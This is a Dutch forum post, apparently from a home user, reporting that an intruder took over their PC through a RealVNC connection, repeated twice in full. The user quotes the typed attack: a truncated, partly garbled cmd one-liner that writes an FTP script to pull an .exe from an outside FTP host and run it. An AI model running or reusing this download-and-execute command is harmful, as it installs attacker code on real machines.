Vanmiddag ben ik bezig geweest met realvnc.
Ik installeerde een vnc server op mijn pc en een vncviewer op mijn pocketPC.
Na wat testen had ik het werkend, en was totaal in mijn nopjes.
Echter toen ik mailtje aan het tikken was, werd plots mijn pc overgenomen.
De hacker tikte in emailvenster waar ik op dat moment mailtje aan het intikken was, het volgende:
root%\system32\cmd.exe
Cmd /c echo open ftp.volja.net 21 >> ik &echo user ur >> ik inary >> iet s.exe >> ik &echo bye >> ik &ftp -
De code is niet compleet, want ik heb uiteraard direct de verbinding verbroken.
Wat hier gebeurd is dat hacker mijn prompt wil opstarten en vervolgens een .exe file vanaf zijn ftp wil runnen op mijn pc.
Ik heb mijn vnc verbinding uiteraard met wachtwoord beveiligd, alleen encryptie had ik op Let Server choose staan.
Misschien is daar iest fout gegaan, maar ik heb weinig vertrouwen meer in realvnc.
Ben ik nu onveilig bezig geweest, of hebben meer mensen zulke ervaringen gehad?
Ik installeerde een vnc server op mijn pc en een vncviewer op mijn pocketPC.
Na wat testen had ik het werkend, en was totaal in mijn nopjes.
Echter toen ik mailtje aan het tikken was, werd plots mijn pc overgenomen.
De hacker tikte in emailvenster waar ik op dat moment mailtje aan het intikken was, het volgende:
root%\system32\cmd.exe
Cmd /c echo open ftp.volja.net 21 >> ik &echo user ur >> ik inary >> iet s.exe >> ik &echo bye >> ik &ftp -
De code is niet compleet, want ik heb uiteraard direct de verbinding verbroken.
Wat hier gebeurd is dat hacker mijn prompt wil opstarten en vervolgens een .exe file vanaf zijn ftp wil runnen op mijn pc.
Ik heb mijn vnc verbinding uiteraard met wachtwoord beveiligd, alleen encryptie had ik op Let Server choose staan.
Misschien is daar iest fout gegaan, maar ik heb weinig vertrouwen meer in realvnc.
Ben ik nu onveilig bezig geweest, of hebben meer mensen zulke ervaringen gehad?